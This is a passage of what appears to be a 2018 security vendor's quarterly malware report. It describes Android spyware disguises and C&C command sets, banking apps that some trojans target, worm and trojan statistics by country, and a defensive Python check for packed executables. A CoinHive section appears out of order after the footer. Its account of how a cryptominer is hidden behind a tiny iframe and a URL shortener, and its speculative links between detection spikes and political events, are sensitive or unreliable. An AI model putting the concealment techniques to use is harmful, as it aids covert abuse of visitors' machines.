Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version-4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64, and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details, and External Storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the applications installed
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:
Extracts photos, audio, and video
Records screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware samples specifically hunt for messengers' data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contact details, and installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: FaceBook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbs
Extract contacts details
Set Wi-Fi to always on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.
App / Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware feature set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, and MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device.
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot.
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server:
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail, and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly operates in Iran. It uses third-party app stores, social networks, and messengers for spreading.
Version 1:
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver, and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers, and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1:
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises named above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them improving its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via ... another cryptominer, named CoinMiner.
How is that possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it, and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2. No one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018 The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda, and over 300 more.
The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr), and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany, and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter, the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za), and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans, and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem, or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction, and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits
Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
This timeline shows not only that Germany had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means of obfuscating the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
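As an added example (not Comodo's code), here is a check a practitioner can run on a suspected packed sample: it parses the PE section table for UPX-style section names and measures per-section byte entropy, since a modified UPX build may rename its sections but still leaves a near-random compressed payload behind. The PE image in the block is constructed inline so the check runs offline.

```python
"""PE packer indicators: UPX-style section names plus per-section entropy.

Added example, not code from the Comodo report. Parses the section table
of a Portable Executable and flags sections named UPX0/UPX1 (the stock
UPX layout) and sections whose byte entropy is near 8 bits, which a
modified UPX build still produces even if it renames its sections.
A minimal PE image is constructed inline so the check runs offline.
"""
import hashlib
import math
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant data, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes) -> list:
    """Return [(name, raw_bytes), ...] for each section header in a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size              # section table follows the optional header
    sections = []
    for i in range(num_sections):
        hdr = table + 40 * i                  # each IMAGE_SECTION_HEADER is 40 bytes
        name = image[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, hdr + 16)
        sections.append((name, image[raw_ptr:raw_ptr + raw_size]))
    return sections


def packer_indicators(image: bytes, entropy_threshold: float = 7.2) -> dict:
    """Summarise UPX-named sections and high-entropy sections in one dict."""
    upx_names, high_entropy = [], []
    for name, raw in pe_sections(image):
        if name.upper().startswith("UPX"):
            upx_names.append(name)
        h = shannon_entropy(raw)
        if h >= entropy_threshold:
            high_entropy.append((name, round(h, 2)))
    return {"upx_sections": upx_names, "high_entropy": high_entropy}


def build_sample_pe() -> bytes:
    """Construct a minimal PE with an empty UPX0 and a pseudo-random UPX1.

    Constructed sample: the UPX1 payload is a SHA-256 chain, deterministic
    but statistically indistinguishable from compressed data.
    """
    payload = b""
    block = b"constructed-seed"
    while len(payload) < 4096:
        block = hashlib.sha256(block).digest()
        payload += block
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)      # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    optional = b"\0" * 224                                 # contents irrelevant here
    raw_ptr = 512
    sec0 = b"UPX0".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", 0x1000, 0x1000, 0, 0, 0, 0, 0, 0, 0)
    sec1 = b"UPX1".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", len(payload), 0x2000, len(payload), raw_ptr, 0, 0, 0, 0, 0)
    header = dos + b"PE\0\0" + coff + optional + sec0 + sec1
    return header.ljust(raw_ptr, b"\0") + payload


if __name__ == "__main__":
    print(packer_indicators(build_sample_pe()))
```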
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
This timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but is still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
Finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. Such programs include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan that has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral events. In mid-April, Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in the infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
REQUEST A DEMO
Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.
© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC.
VISIT COMODO.COM
NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772
ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
The code downloads CoinMiner and checks whether a miner is already running.
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner has the victim's computer to itself and uses its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the brightest example of them.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle: now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener
Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co.
And there we can find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
